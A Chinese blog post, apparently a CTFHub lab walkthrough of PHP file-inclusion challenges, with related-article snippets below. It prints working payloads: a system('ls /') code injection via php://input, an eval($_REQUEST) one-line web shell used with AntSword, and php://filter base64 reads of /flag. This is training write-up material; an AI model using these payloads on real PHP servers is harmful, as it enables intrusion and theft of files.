CTF—Hub文件包含漏洞通关练习

最新推荐文章于 2024-08-07 17:31:02 发布
最新推荐文章于 2024-08-07 17:31:02 发布
阅读量542 收藏
点赞数 1
分类专栏: # web安全 文章标签: php web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/128268079
版权

目录

php伪协议

CTF-01

CTF-02

CTF-03

CTF-04

php伪协议

php://filter

php://input

data://text/plain

zip://

CTF-01

通过phpinfo收集信息 

通过get请求,然后通过burp抓包 

通过post请求执行代码  <?php system('ls /'); ?> (List files)

发现flag_21637,通过cat查看内容 

 

CTF-02

解法同上

 

CTF-03

查看shell发现密码为ctfhub

<?php eval($_REQUEST['ctfhub']);?>

通过中国蚁剑连接到该shell,找到falg文件,拿到flag 

CTF-04

文章给出/flag,通过php的filter伪协议get发起请求即可

php://filter/resource=/flag
php://filter/read=convert.base64-encode/resource=/flag

拿到64编码的内容

解码拿到flag 

coleak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Linux常用命令精讲(基础命令介绍)
Chenwei的博文
11-17 1067
文章目录 目录文章目录一、Shell二、Linux命令的分类1.查看内部命令2.禁用内部命令三、Linux命令行格式四、编辑Linux命令行的辅助操作五、获得命令帮助的方法1.pwd——查看当前的工作目录2.cd——切换工作目录(1)相对路径表现形式六、ls——列表显示目录内容ls的常用选项七、长格式Linux命令2一、alias——设置别名二、du——统计目录及文件空间占用情况三、mkdir——创建新目录四、touch——创建空文件五、ln——创建链接文件1.链接文件类型六、cp——复制文件或目录七、rm
文件包含————ctfhub之读取源文件
qq_45655564的博客
05-29 751
php://filter php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。 PHP.ini: php://filter在双off的情况下也可以正常使用; allow_url_fopen :off/on allow_url_include:off/on 举例: http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php CT
CTF-hub文件包含漏洞
qq_50605865的博客
04-16 2318
第一个文件包含,先审计代码 ls查看一下 尝试找带有“flag”字样的文件,找到了 查看flag,得到flag php:input 还是先审计代码,在url栏发一个input用bp拦截 这里我们把GET类型改为POST类型 末行加入一行PHP 执行ls 找到flag文件后 cat /flag_xxxxx查看 得到flag 远程包含漏洞 审计代码,发一个input用bp拦截 还是改包,查找 找到flag文件,查看得到flag ...
探索PHP过滤链中的错误型Oracle:文件读取漏洞利用工具
gitblog_00001的博客
06-09 470
探索PHP过滤链中的错误型Oracle:文件读取漏洞利用工具 项目地址:https://gitcode.com/synacktiv/php_filter_chains_oracle_exploit 在这个数字化的时代,安全始终是开发者关注的焦点。今天,我们向您介绍一个令人瞩目的开源项目:一个基于命令行接口(CLI)的工具,专门用于利用PHP过滤链中由错误型Oracle引发的文件读取漏洞。这个工具可...
ctfhub-文件包含
m0_62094846的博客
12-13 296
这道题和之前做的文件包含题不大一样,包含了木马 官方的wp写的很清楚文件包含 | CTFHub GET一个file,用file包含的文件会直接出现在index.php中被当作php代码解析 那么,如果file=shell.txt,就可以把木马包含进文件里了 再用蚁剑就可以连接 ...
CTFHUB-文件包含
ITgougou_的博客
12-16 236
思路:利用文件包含执行shell.txt文件,以拿到shell http://challenge-4b90ab5ce47f595f.sandbox.ctfhub.com:10080/?file=shell.txt 点开shell文件 拿到flag ctfhub{869c02e49095087b467fdba8} ...
ctfhub文件包含
a666666688的博客
08-07 597
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
3.18号日报,ctfhubweb,文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhubweb,文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
CTFHub】 RCE - 文件包含
cx_sam的博客
08-07 1717
CTF WEB RCE 文件包含
ctfhub web全部做题记录(持续跟新)
01-08
【总结】在CTF Web挑战中,了解信息泄露、备份文件、源码解析、文件后缀、vim缓存、版本控制、弱口令、SQL注入、文件上传漏洞等概念至关重要。掌握这些技能可以帮助参赛者在比赛中发现并利用安全漏洞,获取flag。...
文件包含漏洞汇总-黑客/渗透测试/CTF通用
最新发布
08-09
适用于文件包含漏洞初学者去进一步了解漏洞的利用,总结前人的经验
CTFHUB文件包含
2201_75447904的博客
04-04 704
但需要注意的是,由于安全原因,大多数浏览器对file://协议有一些限制,例如不允许跨域访问、限制JavaScript执行等,以防止恶意网站利用file://协议进行攻击。而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。: 如果GET参数'file'以"php://"开头,则直接包含用户指定的文件。
文件包含ctfhub
weixin_43326436的博客
08-06 836
1.进入以后,发现的是 应该可以看到是一段代码,strpos这个函数就是查找相同字符串的位置,在这里就是查找和flag相同的字符串的位置,在下面又发现了一个我又一个链接是shell.txt,怎么使用它吗。点进去链接又是一句php,请求ctfhub意思。 2.因为是文件包含,所以直接构造payload 将?shell.txt构造, 所以直接 看到这个图片,利用火狐中的hackbar postdata 输入 ctfhub=system(‘cat /flag’); (system意思就是输出并返回最后一个sh
CTFHub | 文件包含
尼泊罗河伯的博客
05-16 1271
简单分析网页显示内容中的源代码,可以发现一处代码include $_GET["file"] ,其中 include 语句可以动态地包含用户发送的GET 请求。详细的方法将在后续的内容中进行逐步解释。
文件包含————ctfhub文件包含(利用蚁剑或者eval)
qq_45655564的博客
05-29 1059
include()函数 include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。 CTFHUB文件包含 进入页面是这个样子的 <?php error_reporting(0); if (isset($_GET['file'])) { if (!strpos($_GET["file"], "flag")) {#该字符串第一次出现的位置
CTFHubWeb文件包含
qq_45927819的博客
08-04 434
文章目录文件包含php://input远程包含 文件包含 <?php error_reporting(0); if (isset($_GET['file'])) { if (!strpos($_GET["file"], "flag")) { include $_GET["file"]; } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?> <h
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 640
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFHub-Web-RCE-文件包含
qq_54037445的博客
11-29 972
文件包含,伪协议
CTF文件包含漏洞
07-12
CTF(Capture the Flag,网络安全夺旗赛)中,文件包含漏洞通常指的是Web应用安全漏洞的一种,它涉及到服务器将用户请求的数据未经充分验证直接包含到动态生成的内容中,比如PHP的`include()`或`require()`函数。当恶意用户通过输入特殊字符串控制了这些包含操作,可能会导致: 1. **代码注入**:攻击者可以插入恶意脚本,被执行时可能导致服务器权限提升、数据泄露或其他破坏。 2. **信息泄露**:通过读取系统目录下的敏感文件,如配置文件、数据库连接信息等,获取到不必要的内部信息。 3. **本地文件包含(LFI)**:允许攻击者从服务器本地目录中加载任意文件,可能进一步导致源码泄露、攻击者上传文件甚至远程代码执行。 为了修复此类漏洞,开发人员应采用安全文件包含实践,例如使用参数化查询、使用安全的文件路径解析函数,并对用户提交的数据进行严格的验证和过滤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值